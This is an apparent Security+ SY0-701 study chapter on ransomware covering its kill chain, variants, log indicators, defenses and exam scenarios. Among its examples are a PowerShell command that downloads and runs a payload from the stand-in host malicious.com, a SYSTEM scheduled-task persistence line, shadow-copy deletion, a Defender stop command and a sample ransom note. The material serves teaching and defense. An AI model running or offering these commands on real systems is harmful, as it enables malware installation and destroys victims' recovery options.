This chapter covers ransomware attacks, a dominant threat in the SY0-701 exam domain 'Threats, Vulnerabilities, and Mitigations' under objective 2.4. Ransomware is a type of malware that encrypts files or locks systems, demanding payment for decryption. Understanding its mechanisms, variants, and defenses is critical for security professionals, as ransomware incidents continue to escalate globally.
Jump to a section
Imagine a kidnapper who sneaks into a high-security office building at night. Instead of stealing cash, they lock all the filing cabinets with their own heavy padlocks and then demand a ransom in cryptocurrency for the keys. The kidnapper first gains entry by exploiting a weak lock on a side door (phishing email), then disables the alarm system (disabling antivirus), and uses a master key they found in a janitor's closet (privilege escalation) to lock every cabinet in the building. The victims see a note on each cabinet: 'Pay 10 Bitcoin to [address] within 48 hours or the locks become unbreakable.' The kidnapper doesn't steal anything—they just prevent access to what's already there. The victims must decide: pay the ransom and hope the kidnapper sends the real keys (decryptor), or spend weeks drilling open each cabinet (restoring from backup). The kidnapper's leverage is the victim's fear of losing irreplaceable data, just as ransomware attackers exploit the criticality of data to force payment.
What Ransomware Is and Why It Matters
Ransomware is malware that denies access to data or systems until a ransom is paid. It is a form of extortion, often targeting organizations with critical data. For SY0-701, you must know how ransomware operates, common infection vectors, and mitigation strategies. Ransomware is a top concern due to its financial and operational impact; the FBI reported over $59 million in losses in 2023 alone.
How Ransomware Works Mechanically
Ransomware follows a kill chain: infection, persistence, encryption, and ransom demand.
Infection: The initial vector is often phishing (e.g., malicious attachments or links), exploit kits, or Remote Desktop Protocol (RDP) brute-force. For example, the Emotet trojan delivered ransomware via malicious macro-enabled documents.
Persistence: The ransomware installs itself, often adding registry keys (e.g., HKCU\Software\Microsoft\Windows\CurrentVersion\Run) or creating scheduled tasks to survive reboots.
Encryption: The ransomware generates a symmetric key (e.g., AES-256) to encrypt files, then encrypts that key with an asymmetric public key (e.g., RSA-2048) from the attacker's command-and-control (C2) server. It targets file extensions like .docx, .xlsx, .pdf, and .jpg, often excluding system files to maintain functionality.
Ransom Demand: A note (e.g., README.txt or HOW_TO_DECRYPT.html) is dropped in each directory, containing payment instructions (usually Bitcoin or Monero) and a deadline. The note may threaten to delete the decryption key or leak data (double extortion).
Key Components, Variants, and Standards
- Components: Encryption engine (AES/RSA), C2 communication (HTTP/HTTPS, Tor), persistence mechanisms, and ransom note generator. - Variants: - Crypto ransomware: Encrypts files (e.g., Ryuk, Conti, LockBit). - Locker ransomware: Locks the entire system (e.g., Reveton, WinLocker). - Ransomware-as-a-Service (RaaS): Attackers sell or lease ransomware kits (e.g., REvil, DarkSide). - Double extortion: Exfiltrates data before encryption, threatening to leak it if ransom not paid (e.g., Maze, Clop). - Wiper malware: Destroys data without recovery, sometimes disguised as ransomware (e.g., NotPetya, Shamoon). - Standards: The Cyber Kill Chain (Lockheed Martin) and MITRE ATT&CK framework (e.g., technique T1486 for data encryption) are used to analyze ransomware.
How Attackers Exploit Ransomware
Attackers leverage several techniques to maximize impact:
- Living off the land: Using legitimate tools like PowerShell, PsExec, and WMI to deploy ransomware, evading detection.
- Lateral movement: After initial access, attackers move across the network using stolen credentials or exploits (e.g., EternalBlue, CVE-2017-0144) to infect more systems.
- Disabling defenses: Ransomware may stop services like Windows Defender (sc stop WinDefend) or delete shadow copies (vssadmin delete shadows /all).
- Time bombs: Some ransomware waits days or weeks after infection to activate, making backups useless if they are also encrypted.
Real Command/Tool Examples
- Infection vector: Phishing email with macro-enabled Word document. When macros are enabled, it downloads the ransomware payload via PowerShell:
powershell -c "Invoke-WebRequest -Uri http://malicious.com/payload.exe -OutFile $env:temp\payload.exe; Start-Process $env:temp\payload.exe"- Persistence: Adding a scheduled task:
schtasks /create /tn "UpdateTask" /tr "C:\Windows\system32\rundll32.exe C:\Users\victim\AppData\Local\Temp\payload.dll,Start" /sc onlogon /ru SYSTEM- Encryption: The ransomware iterates over drives and encrypts files using a cryptographic API:
// Pseudocode for file encryption
HCRYPTPROV hProv;
CryptAcquireContext(&hProv, NULL, MS_ENH_RSA_AES_PROV, PROV_RSA_AES, 0);
CryptGenKey(hProv, CALG_AES_256, CRYPT_EXPORTABLE, &hKey);
// Encrypt file with hKey, then encrypt hKey with RSA public key- Shadow copy deletion:
vssadmin delete shadows /all /quiet- Ransom note: A typical note contains:
Your files have been encrypted!
To recover them, send 1 Bitcoin to: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
After payment, contact us at: torlink.onionDefensive Measures
Backups: Maintain offline or immutable backups (3-2-1 rule: 3 copies, 2 different media, 1 offsite).
Email security: Filter attachments and links, block macros from internet sources.
Endpoint protection: Use EDR solutions that detect ransomware behavior (e.g., mass file encryption).
Network segmentation: Limit lateral movement by isolating critical systems.
Patch management: Apply patches for known vulnerabilities (e.g., EternalBlue).
User training: Teach users to recognize phishing attempts.
Incident response: Have a plan to isolate infected systems, preserve evidence, and restore from backups.
Initial Access via Phishing
The attacker sends a spear-phishing email with a malicious attachment (e.g., a Word document with a macro) or a link to a compromised website. The email is crafted to appear urgent or from a trusted source. When the user opens the attachment and enables macros, a PowerShell script downloads the ransomware payload from a remote server. Logs would show an outbound connection to a suspicious IP and a new process spawned by Office applications (e.g., winword.exe spawning powershell.exe).
Establish Persistence
The ransomware installs itself to survive reboots. It may add a registry run key (e.g., `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`) or create a scheduled task. It may also copy itself to multiple locations (e.g., `%AppData%`, `%Temp%`). Logs from Sysmon (Event ID 1 for process creation, Event ID 13 for registry modification) would show the payload creating persistence mechanisms. The attacker may also disable security tools using `sc stop` or `net stop` commands.
Privilege Escalation
The ransomware attempts to gain higher privileges (e.g., SYSTEM or Administrator) to encrypt more files and disable defenses. Common techniques include exploiting vulnerabilities (e.g., CVE-2021-34527 for PrintNightmare) or using credential dumping tools (e.g., Mimikatz) to extract passwords from memory. Logs would show unexpected privilege changes (Windows Event ID 4672 for special privileges assigned) or access to LSASS process (Event ID 10 from Sysmon).
Lateral Movement
Using stolen credentials or exploits, the ransomware spreads across the network to other systems. It may use PsExec (`psexec \\target -u user -p pass cmd.exe`) or WMI to execute the payload remotely. It targets file shares and network drives. Network logs would show multiple SMB connections (port 445) to internal IPs, and endpoint logs would show remote service creation (Event ID 7045).
Encryption and Ransom Demand
The ransomware begins encrypting files on local drives, network shares, and removable media. It uses AES-256 to encrypt files and RSA-2048 to protect the AES key. It skips system files to avoid crashing the OS. After encryption, it deletes Volume Shadow Copies using `vssadmin delete shadows /all` to prevent recovery. It then drops ransom notes (e.g., `README.txt`) in each directory and changes the desktop wallpaper to display the ransom message. Logs would show mass file modifications (Sysmon Event ID 11 for file creation) and shadow copy deletion (Event ID 7036 for service state change).
Scenario 1: Hospital Hit by Ryuk Ransomware
A hospital's IT team notices that file servers containing patient records are being encrypted. Analysts see alerts from their EDR: multiple endpoints are executing vssadmin delete shadows and powershell -c Invoke-WebRequest to a known malicious IP. The ransomware (Ryuk) spread via Emotet trojan from a phishing email. The correct response: immediately isolate affected systems by disconnecting network cables, preserve memory for forensics, and restore from offline backups. A common mistake: paying the ransom, which encourages future attacks and may not guarantee decryption.
Scenario 2: Manufacturing Company Hit by Double Extortion
A manufacturing company receives a ransom note from the Clop gang, claiming they have exfiltrated 100 GB of sensitive data. The attackers threaten to publish the data on their leak site if the ransom is not paid. Analysts find that the initial access was through a vulnerable RDP endpoint (port 3389 exposed to the internet). The correct response: reset all passwords, patch the RDP vulnerability, and engage incident response to investigate data exfiltration. A common mistake: ignoring the data theft and focusing only on decryption, leading to public data leaks.
Scenario 3: Ransomware-as-a-Service (RaaS) Attack on a School District
A school district's systems are encrypted by LockBit ransomware. The attackers demand 50 Bitcoin. Analysts trace the infection to a student who downloaded a cracked game. The ransomware used a builder from the LockBit RaaS platform. The correct response: block the ransomware's C2 domains (using threat intelligence feeds), restore from backups, and implement application whitelisting to prevent unauthorized executables. A common mistake: assuming that paying the ransom will resolve the issue quickly, when in reality it may fund criminal operations and lead to repeat attacks.
What SY0-701 Tests on This Objective
Objective 2.4 requires you to 'Explain the techniques and technologies used to mitigate threats and vulnerabilities.' For ransomware, the exam focuses on:
Recognizing ransomware indicators (e.g., ransom notes, encrypted file extensions, shadow copy deletion).
Understanding infection vectors: phishing, drive-by downloads, RDP brute-force, and software vulnerabilities.
Mitigation strategies: backups (3-2-1 rule), user training, email filtering, patching, endpoint protection, and network segmentation.
Differentiating ransomware from wiper malware (wiper destroys data without recovery).
Common Wrong Answers and Why Candidates Choose Them
'Paying the ransom is the best option' – Candidates think it guarantees data recovery, but paying funds crime and may not lead to decryption.
'Ransomware only targets individuals' – Many believe it's only a consumer threat, but enterprises are primary targets.
'Antivirus alone stops ransomware' – Traditional AV may miss novel variants; EDR and behavior-based detection are needed.
'Ransomware cannot be prevented' – While not 100% preventable, proper controls drastically reduce risk.
Specific Terms, Values, and Acronyms
RaaS: Ransomware-as-a-Service.
Double extortion: Exfiltration + encryption.
AES-256: Symmetric encryption algorithm used for file encryption.
RSA-2048: Asymmetric encryption for key protection.
C2: Command and control server.
Shadow copy: Volume Shadow Copy Service (VSS) backups that ransomware deletes.
3-2-1 rule: 3 copies, 2 media, 1 offsite.
Common Trick Questions
'Which type of malware encrypts files and demands payment?' – Ransomware, not wiper or trojan.
'What is the best defense against ransomware?' – Backups, not antivirus.
'Which attack vector is most common for ransomware?' – Phishing, not brute-force.
Decision Rule for Scenario Questions
If a question describes encrypted files with a ransom note, the answer involves ransomware. Look for clues like 'shadow copies deleted' or 'extension changed to .encrypted'. For mitigation, choose backup/restore over payment. If data is also stolen, double extortion is the variant.
Ransomware is malware that encrypts files and demands payment for decryption.
Common infection vectors: phishing, RDP brute-force, exploit kits, and software vulnerabilities.
The 3-2-1 backup rule (3 copies, 2 media, 1 offsite) is the primary defense.
Ransomware often deletes Volume Shadow Copies to prevent recovery.
Double extortion involves data exfiltration and encryption, with threat of data leak.
RaaS (Ransomware-as-a-Service) allows non-technical attackers to launch ransomware campaigns.
Paying the ransom does not guarantee data recovery and funds criminal activity.
These come up on the exam all the time. Here's how to tell them apart.
Ransomware
Encrypts files for ransom
Demands payment for decryption key
Data can be recovered with backup or decryptor
Often uses double extortion
Examples: Ryuk, LockBit, REvil
Wiper Malware
Destroys data without recovery option
No ransom demand (or fake demand to mislead)
Data is permanently lost
Often used for sabotage or destruction
Examples: NotPetya, Shamoon, WhisperGate
Mistake
Ransomware only affects Windows systems.
Correct
Ransomware can target Linux, macOS, and even mobile devices, though Windows is most common. For example, Linux.Encoder targeted Linux servers.
Mistake
Paying the ransom always decrypts your files.
Correct
There is no guarantee; some attackers take the money and provide a faulty decryptor or none at all. The FBI advises against paying.
Mistake
Ransomware cannot be removed without paying.
Correct
With proper backups, you can restore encrypted files without paying. Some decryption tools are available for older variants (e.g., No More Ransom project).
Mistake
Ransomware only spreads through email attachments.
Correct
It can also spread via malicious websites, RDP brute-force, infected USB drives, and network propagation (e.g., WannaCry used EternalBlue).
Mistake
Antivirus software is sufficient to prevent ransomware.
Correct
AV may detect known signatures but fail against zero-day variants. EDR and behavior-based detection are more effective.
Phishing emails containing malicious attachments or links are the most common vector. The user is tricked into opening an attachment (e.g., a Word document with a macro) or clicking a link that downloads the ransomware. For example, the Emotet trojan often delivered ransomware via macro-enabled documents. In the exam, if a question mentions an email, think phishing.
No, traditional antivirus relies on signatures and may miss new or polymorphic ransomware. Endpoint Detection and Response (EDR) solutions that use behavioral analysis (e.g., detecting mass file encryption) are more effective. The exam emphasizes layered defenses: user training, email filtering, patching, and backups.
Double extortion is a variant where attackers exfiltrate sensitive data before encrypting files. They then threaten to leak the data if the ransom is not paid, increasing pressure. Examples include Maze and Clop. In the exam, this is a key concept: if data is stolen, it's double extortion.
Ransomware commonly runs the command `vssadmin delete shadows /all /quiet` to delete Volume Shadow Copies, which are Windows backup snapshots. This prevents easy recovery. The exam tests that shadow copy deletion is a common ransomware behavior.
First, isolate infected systems by disconnecting from the network. Do not pay the ransom. Restore from clean backups if available. Preserve evidence for forensics. Engage incident response and report to law enforcement. The exam expects you to choose backup restoration over payment.
RaaS is a business model where developers create ransomware and sell or lease it to affiliates who carry out attacks. The developer takes a cut of the ransom. This lowers the barrier to entry for criminals. Examples include REvil and DarkSide. The exam may ask about RaaS as a threat enabler.
Ransomware uses stolen credentials or exploits (e.g., EternalBlue) to spread across a network via SMB, PsExec, or WMI. It may also infect network shares. The exam covers lateral movement as a phase of the attack kill chain.
You've just covered Ransomware Attacks — now see how well it sticks with free SY0-701 practice questions. Full explanations included, no account needed.
Done with this chapter?